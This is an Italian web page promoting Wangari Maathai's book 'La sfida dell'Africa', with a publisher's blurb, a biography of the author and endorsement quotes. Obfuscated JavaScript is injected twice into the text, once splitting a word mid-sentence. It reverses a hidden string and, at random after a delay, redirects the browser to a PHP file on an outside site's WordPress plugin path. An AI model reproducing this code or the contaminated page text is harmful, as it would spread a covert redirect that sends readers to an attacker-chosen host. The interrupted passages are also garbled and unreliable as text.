"La sfida dell'Africa", del premio Nobel Wangari Maathai

image_pdfimage_print

Per molti di noi pensare all’Africa significa richiamare alla mente bambini dal ventre gonfio, uomini e donne afflitti dalla povertà e dalla disperazione. Ed è questa l’immagine che i media tendono a trasmettere più di frequente, per rendere la misura dei problemi che affliggono il continente e fare appello ai nostri sentimenti di solidarietà. L’Africa è certamente questo, ma è anche molto altro. In questo libro Wangari Maathai, premio Nobel per la pace e fondatrice del Green Belt Movement, offre uno sguardo diverso sul continente e al tempo stesso invita con veemenza gli stessi africani a liberarsi del sentimento di inferiorità che da secoli li affligge, e a recuperare le proprie radici culturali e il senso della dignità prendendo in mano il proprio destino. Maathai lancia un appello per una rivoluzione morale che porti gli abitanti del continente a collaborare, alla pari, con la comunità internazionale per il futuro dell’Africa, assumendosi le proprie responsabilità e affranc (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andosi dalla dipendenza dagli aiuti. Non è più possibile sperare in un soccorso che cada dall’alto, come una manna divina. È tempo che l’Africa si rialzi e cammini con le proprie gambe.

[Acquista online il libro “La sfida dell’Africa” edizioni Nuovi Mondi]

Con un’esposizione chiara e dettagliata, l’autrice prende in esame i principali ostacoli che frenano lo sviluppo del continente, a livello internazionale, nazionale e dei singoli cittadini – lo stravolgimento culturale, la perdurante povertà, una leadership corrotta e iniqua interessata a fomentare i conflitti su base etnica – e descrive con efficacia ciò che gli africani possono e devono fare per sé stessi.

Forte di trent’anni di impegno come ambientalista e attivista per la democrazia, l’autrice propone un’analisi attenta e fiduciosa della complessa e dinamica natura dell’Africa, mettendo in luce opportunità concrete e scelte realistiche all’insegna del cambiamento e del progresso. Appassionato e partecipe, La sfida dell’Africa è un libro di grandissima importanza per il futuro non solo del continente ma di tutto il pianeta.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/03/200africa1.png”>Il libro di Wangari Maathai
Il libro di Wangari Maathai

Wangari Maathai – Nel 1971 è stata la prima donna centrafricana a laurearsi presso l’Università di Nairobi; sei anni dopo, ha fondato il Green Belt Movement, un’associazione no profit costituita da donne provenienti da aree rurali che nel solo Kenya ha piantato 40 milioni di alberi per combattere il disboscamento. Nel 2002 è stata eletta al parlamento keniota, e l’anno seguente è stata nominata sottosegretario per l’ambiente, le risorse naturali e la fauna selvatica. Nel 2004 è stata insignita del premio Nobel per la Pace “per il suo operato nel campo dei diritti delle donne, perché il suo lavoro ha ispirato moltissimi altri attivisti, perché ha saputo conciliare la scienza e il lavoro democratico”.
Autrice del testo autobiografico Solo il vento mi piegherà (Sperling & Kupfer, 2007), tiene conferenze in tutto il mondo. Vive a Nairobi.

***

“In tutte le analisi dei problemi dell’Africa, c’è una risorsa naturale che spesso non viene apprezzata: gli africani stessi.” – Wangari Maathai

“Questo libro è un manifesto per il cambiamento, che veicola un messaggio cruciale tanto per le agenzie umanitarie e i governi quanto per una contadina che coltiva il fianco di una collina in Kenya.” – The Ecologist

“Wangari Maathai e il Green Belt Movement ci mostrano le soluzioni che porteranno l’Africa a rivedere la luce. Spero che il mondo sostenga le sue idee e il suo messaggio di speranza.” – Nelson Mandela

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *